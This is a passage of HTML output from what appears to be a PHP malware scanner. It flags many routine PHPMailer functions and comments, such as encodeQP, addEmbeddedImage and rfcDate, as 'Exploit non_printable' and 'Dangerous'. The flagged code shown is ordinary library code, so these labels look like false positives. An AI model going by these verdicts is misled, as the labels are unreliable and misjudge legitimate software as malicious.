</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3194</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">quoted</span><span style="color: #007700">-</span><span style="color: #0000BB">printable</span><span style="color: #007700">-</span><span style="color: #0000BB">decode</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#89417 Adapted from this comment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max </span><span style="color: #007700">= </span><span style="color: #0000BB">76</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3198</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s available (>= PHP5.3)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'quoted_printable_encode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3200</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">quoted_printable_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[^\r\n]{' </span><span style="color: #007700">. (</span><span style="color: #0000BB">$line_max </span><span style="color: #007700">- </span><span style="color: #0000BB">3</span><span style="color: #007700">) . </span><span style="color: #DD0000">'}[^=\r\n]{2}/'</span><span style="color: #007700">, </span><span style="color: #DD0000">"$0=\r\n"</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that was removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3221</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQPphp</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3226</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">' '</span><span style="color: #007700">, </span><span style="color: #DD0000">'_'</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3288</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringAttachment</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3327</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True on successfully adding an attachment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3329</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addEmbeddedImage</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$cid</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'inline'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path</span><span style="color: #007700">) </span><span style="color: #0000BB">of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringEmbeddedImage</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3406</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inlineImageExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3420</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachmentExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 342</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternativeExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3436</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">AltBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearQueuedAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearBCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3498</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearReplyTos</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ReturnPath </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAllRecipients</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3530</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3541</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setError</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3563</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">an RFC 822 formatted date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3568</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rfcDate</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3573</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">date</span><span style="color: #007700">(</span><span style="color: #DD0000">'D, j M Y H:i:s O'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3578</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns </span><span style="color: #DD0000">'localhost.localdomain' </span><span style="color: #007700">if </span><span style="color: #0000BB">unknown</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3582</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">serverHostname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3589</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gethostname'</span><span style="color: #007700">) && </span><span style="color: #0000BB">gethostname</span><span style="color: #007700">() !== </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lang</span><span style="color: #007700">(</span><span style="color: #0000BB">$key</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3614</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">] . </span><span style="color: #DD0000">' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3616</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3618</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the key </span><span style="color: #007700">as </span><span style="color: #0000BB">a fallback</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$key</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">if </span><span style="color: #0000BB">an error did occur</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3628</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isError</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">error_count </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3640</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fixEOL</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3648</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$nstr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3660</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCustomHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3671</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns all custom headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3674</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3676</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CustomHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3693</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $message The transformed message Body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">msgHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$basedir </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3708</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3766</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">Body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">used a bundled advanced converter</span>
</span>
